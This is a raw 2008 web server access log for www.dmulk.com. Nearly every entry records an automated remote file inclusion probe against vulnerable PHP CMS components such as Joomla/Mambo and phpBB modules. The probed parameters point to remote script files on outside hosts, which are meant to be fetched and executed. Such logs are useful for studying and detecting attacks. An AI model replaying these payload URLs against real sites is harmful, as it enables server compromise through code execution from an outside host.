84.21.71.133 - - [28/May/2008:09:47:15 -0700] "GET /logs/access_080218.log/photo/update/update5.php?lang=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.140 - - [28/May/2008:09:47:19 -0700] "GET /logs/access_080118.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.127 - - [28/May/2008:09:47:25 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:47:28 -0700] "GET /logs/access_080308.log/photo/update/update5.php?lang=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:47:28 -0700] "GET /photo/update/update5.php?lang=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:47:28 -0700] "GET /logs/photo/update/update5.php?lang=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:47:28 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:47:29 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:47:29 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:09:47:35 -0700] "GET /avatar.php?page=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:47:37 -0700] "GET /logs/access_080216.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:47:37 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:47:37 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:47:37 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:47:38 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:47:38 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:47:42 -0700] "GET /logs/access_080218.log/photo/update/update5.php?lang=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:09:47:53 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:09:47:54 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:09:47:54 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:09:47:58 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:48:20 -0700] "GET /logs/access_080310.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.30.73.117 - - [28/May/2008:09:48:29 -0700] "GET /logs/protection.php?action=logout&siteurl=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
200.30.73.117 - - [28/May/2008:09:48:33 -0700] "GET /protection.php?action=logout&siteurl=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:48:35 -0700] "GET /logs/photo/update/update5.php?lang=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:48:35 -0700] "GET /photo/update/update5.php?lang=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.76.116.20 - - [28/May/2008:09:48:46 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:09:48:56 -0700] "GET /logs/photo/update/update5.php?lang=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:09:48:56 -0700] "GET /photo/update/update5.php?lang=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:49:02 -0700] "GET /logs//components/com_rsgallery/common/db.php=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.0.18.81 - - [28/May/2008:09:49:04 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
75.0.18.81 - - [28/May/2008:09:49:04 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:49:08 -0700] "GET //components/com_rsgallery/common/db.php=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.85.34 - - [28/May/2008:09:49:29 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://o-x-r-a-n-a.ru/forum/language/.lang/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:49:29 -0700] "GET /logs/access_080215.log//?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:09:49:57 -0700] "GET /logs/access_080326.log/avatar.php?page=http://www.bestpaket.ru/netcat//dump/nid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:09:50:24 -0700] "GET /logs/access_080212.log/avatar.php?page=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:09:50:24 -0700] "GET /logs/avatar.php?page=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.134.240.162 - - [28/May/2008:09:50:39 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.240.162 - - [28/May/2008:09:50:39 -0700] "GET //classes/adodbt/sql.php?classes_dir=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.12.42 - - [28/May/2008:09:50:44 -0700] "GET /tmp/?D=D HTTP/1.0" 200 981 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.125.252.82 - - [28/May/2008:09:51:04 -0700] "GET /logs/access_080322.log/administrator/components/com_peoplebook/includes/dbal.include_dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [28/May/2008:09:51:04 -0700] "GET /logs/administrator/components/com_peoplebook/includes/dbal.include_dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:09:51:24 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:09:51:25 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
141.53.8.217 - - [28/May/2008:09:51:52 -0700] "GET /logs/index.php?go=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:51:54 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:51:54 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
141.53.8.217 - - [28/May/2008:09:51:55 -0700] "GET /index.php?go=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [28/May/2008:09:52:05 -0700] "GET /logs/index.php?incl=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [28/May/2008:09:52:07 -0700] "GET /index.php?incl=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:09:52:21 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:09:52:21 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:09:52:23 -0700] "GET /logs/access_080117.log/components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:09:52:23 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:09:52:23 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.217.32 - - [28/May/2008:09:52:29 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
212.34.138.245 - - [28/May/2008:09:53:16 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.138.245 - - [28/May/2008:09:53:16 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.138.245 - - [28/May/2008:09:53:17 -0700] "GET /logs/access_071214.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.53.8.217 - - [28/May/2008:09:53:19 -0700] "GET /logs//modules/My_eGallery/index.php?include_path=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.53.8.217 - - [28/May/2008:09:53:20 -0700] "GET //modules/My_eGallery/index.php?include_path=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:53:24 -0700] "GET /logs//components/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:53:25 -0700] "GET //components/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:54:06 -0700] "GET /logs//add.php?Htmls=http://www.iglesialcs.cl/newweb/cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:54:06 -0700] "GET //add.php?Htmls=http://www.iglesialcs.cl/newweb/cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:54:06 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/nialeva/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:54:06 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/nialeva/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
80.67.23.140 - - [28/May/2008:09:54:08 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [28/May/2008:09:54:08 -0700] "GET //common/db.php?commonpath=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [28/May/2008:09:54:08 -0700] "GET /logs//common/db.php?commonpath=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:09:54:17 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:09:54:17 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:09:54:18 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:54:46 -0700] "GET /logs/access_080216.log//faqsupport/samplefaqsupport.php?path[docroot]=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:54:46 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:54:46 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:54:48 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:54:48 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
66.230.197.245 - - [28/May/2008:09:54:51 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:54:57 -0700] "GET /logs/photo/update/update5.php?lang=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:54:57 -0700] "GET /photo/update/update5.php?lang=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.7.147.137 - - [28/May/2008:09:55:00 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
196.7.147.137 - - [28/May/2008:09:55:00 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:09:55:16 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:09:55:16 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
80.67.23.140 - - [28/May/2008:09:55:19 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.209.138 - - [28/May/2008:09:55:36 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.179.180.45 - - [28/May/2008:09:55:42 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
202.179.180.45 - - [28/May/2008:09:55:48 -0700] "GET / HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:55:50 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:55:50 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:55:50 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/nialeva/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:55:51 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/nialeva/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.198.106.61 - - [28/May/2008:09:55:59 -0700] "GET /logs/access_080201.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [28/May/2008:09:56:00 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [28/May/2008:09:56:00 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:09:56:02 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:09:56:02 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:56:05 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:09:56:09 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:09:56:13 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:09:56:13 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:09:56:16 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:09:56:16 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:09:56:16 -0700] "GET //index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:56:17 -0700] "GET /logs/access_080327.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:09:56:25 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:56:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/nialeva/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:56:28 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/nialeva/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:56:46 -0700] "GET //add.php?Htmls=http://www.iglesialcs.cl/newweb/cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:56:46 -0700] "GET /logs//add.php?Htmls=http://www.iglesialcs.cl/newweb/cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:09:56:48 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:09:56:49 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
